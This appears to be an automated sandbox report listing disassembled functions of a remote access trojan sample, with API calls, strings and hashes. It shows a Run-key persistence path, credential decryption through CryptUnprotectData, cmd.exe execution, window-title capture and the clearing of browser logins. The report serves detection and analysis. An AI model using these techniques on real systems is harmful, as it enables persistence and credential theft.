                                    Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLocalTime.KERNEL32(?), ref: 00404F81
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                    • CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0
                                    Strings
                                    • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Create$EventLocalThreadTime
                                    • String ID: KeepAlive | Enabled | Timeout:
                                    • API String ID: 2532271599-1507639952
                                    • Opcode ID: 7c8a9ce4b383af45d5410d66a549d3ab3812e2de270479e75a3fa2d1d41e82a0
                                    • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                                    • Opcode Fuzzy Hash: 7c8a9ce4b383af45d5410d66a549d3ab3812e2de270479e75a3fa2d1d41e82a0
                                    • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                                    Function 00406A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                                    • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: CryptUnprotectData$crypt32
                                    • API String ID: 2574300362-2380590389
                                    • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                    • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                    • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                    • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                    Function 0044C253 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0044C302,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0044C28C
                                    • GetLastError.KERNEL32 ref: 0044C296
                                    • __dosmaperr.LIBCMT ref: 0044C29D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorFileLastPointer__dosmaperr
                                    • String ID: PkGNG
                                    • API String ID: 2336955059-263838557
                                    • Opcode ID: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                                    • Instruction ID: 03228b3a5a263cac3d3762c0c6cb9bea0ee6cefe7ee70a3785aa569069518732
                                    • Opcode Fuzzy Hash: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                                    • Instruction Fuzzy Hash: 9E016D32A11104BBDF008FE9CC4089E3719FB86320B28039AF810A7290EAB5DC118B64
                                    Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                    • CloseHandle.KERNEL32(?), ref: 004051CA
                                    • SetEvent.KERNEL32(?), ref: 004051D9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandleObjectSingleWait
                                    • String ID: Connection Timeout
                                    • API String ID: 2055531096-499159329
                                    • Opcode ID: 16c0c5432ea764d1c3b3677813c316a5f50629e206d56325c82df1a06a1f960a
                                    • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                    • Opcode Fuzzy Hash: 16c0c5432ea764d1c3b3677813c316a5f50629e206d56325c82df1a06a1f960a
                                    • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                    Function 0040E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                    Download Yara Rule
                                    APIs
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Exception@8Throw
                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                    • API String ID: 2005118841-1866435925
                                    • Opcode ID: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                                    • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                    • Opcode Fuzzy Hash: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                                    • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                    Function 0041CAE1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB09
                                    • LocalFree.KERNEL32(?,?), ref: 0041CB2F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FormatFreeLocalMessage
                                    • String ID: @J@$PkGNG
                                    • API String ID: 1427518018-1416487119
                                    • Opcode ID: 582a0a935ffae84e33b405a2c8e80a835bcb557197e1ba62297b84e69e8a9d31
                                    • Instruction ID: 02a9d8e2c753fe243ccbc909122ce1ddd8f8b45a09ed5088e6b723b988b0f700
                                    • Opcode Fuzzy Hash: 582a0a935ffae84e33b405a2c8e80a835bcb557197e1ba62297b84e69e8a9d31
                                    • Instruction Fuzzy Hash: 5EF0A434B0021AAADF08A7A6DD4ADFF7769DB84305B10007FB606B21D1EEB86D05D659
                                    Function 00413814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041381F
                                    • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,74DF37E0,?), ref: 0041384D
                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752D8,74DF37E0,?,?,?,?,?,0040CFAA,?,00000000), ref: 00413858
                                    Strings
                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041381D
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                    • API String ID: 1818849710-1051519024
                                    • Opcode ID: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                    • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                                    • Opcode Fuzzy Hash: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                    • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                                    Function 0040DFA6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                                      • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                                      • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                    • String ID: bad locale name
                                    • API String ID: 3628047217-1405518554
                                    • Opcode ID: 03a3a1b6538e95a80bbc96a5a3230d3fb174e533ca0510e3d942a7448ac3be7a
                                    • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                                    • Opcode Fuzzy Hash: 03a3a1b6538e95a80bbc96a5a3230d3fb174e533ca0510e3d942a7448ac3be7a
                                    • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                                    Function 0041376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                                    • RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                                    • RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID: Control Panel\Desktop
                                    • API String ID: 1818849710-27424756
                                    • Opcode ID: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                    • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                    • Opcode Fuzzy Hash: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                    • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                                    Function 00416C2D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                                    • ShowWindow.USER32(00000009), ref: 00416C61
                                    • SetForegroundWindow.USER32 ref: 00416C6D
                                      • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                      • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                      • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                    • String ID: !D@
                                    • API String ID: 3446828153-604454484
                                    • Opcode ID: 6979cefb1d1fefa54efaa96eb459276fcc124e6eae3c34ad0f1a5970b9474eaa
                                    • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                                    • Opcode Fuzzy Hash: 6979cefb1d1fefa54efaa96eb459276fcc124e6eae3c34ad0f1a5970b9474eaa
                                    • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                                    Function 004160EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                    Download Yara Rule
                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell
                                    • String ID: /C $cmd.exe$open
                                    • API String ID: 587946157-3896048727
                                    • Opcode ID: 1fb54d341f42364606467e993f20cb3c4ceaa424224daa94047b07daa39982c0
                                    • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                    • Opcode Fuzzy Hash: 1fb54d341f42364606467e993f20cb3c4ceaa424224daa94047b07daa39982c0
                                    • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                    Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: GetCursorInfo$User32.dll
                                    • API String ID: 1646373207-2714051624
                                    • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                    • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
                                    • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                    • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
                                    Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                    • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetLastInputInfo$User32.dll
                                    • API String ID: 2574300362-1519888992
                                    • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                    • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
                                    • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                    • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
                                    Function 00456C1A Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                    • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                                    • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                    • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                                    Function 0040C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                    • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep
                                    • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                    • API String ID: 3472027048-1236744412
                                    • Opcode ID: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
                                    • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                                    • Opcode Fuzzy Hash: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
                                    • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                                    Function 0040A529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                                      • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                                      • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                                    • Sleep.KERNEL32(000001F4), ref: 0040A573
                                    • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Window$SleepText$ForegroundLength
                                    • String ID: [ $ ]
                                    • API String ID: 3309952895-93608704
                                    • Opcode ID: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                                    • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                                    • Opcode Fuzzy Hash: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                                    • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                                    Function 00443A33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                    • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                                    • Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                    • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                                    Function 00443AB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                    • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                                    • Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                    • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                                    Function 0041C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                    • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4B2
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4D7
                                    • CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E74), ref: 0041C4E5
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleReadSize
                                    • String ID:
                                    • API String ID: 3919263394-0
                                    • Opcode ID: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                                    • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                                    • Opcode Fuzzy Hash: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                                    • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                                    Function 0041C1DD Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                    • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleOpenProcess
                                    • String ID:
                                    • API String ID: 39102293-0
                                    • Opcode ID: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                                    • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                                    • Opcode Fuzzy Hash: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                                    • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                                    Function 00439863 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                      • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                    • _UnwindNestedFrames.LIBCMT ref: 00439891
                                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                    • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                    • String ID:
                                    • API String ID: 2633735394-0
                                    • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                    • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                                    • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                    • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                                    Function 004193E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                                    • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                                    • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                                    • GetSystemMetrics.USER32(0000004F), ref: 00419402
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: MetricsSystem
                                    • String ID:
                                    • API String ID: 4116985748-0
                                    • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                    • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                                    • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                    • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                                    Function 00438F31 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                                      • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                    • String ID:
                                    • API String ID: 1761009282-0
                                    • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                    • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                                    • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
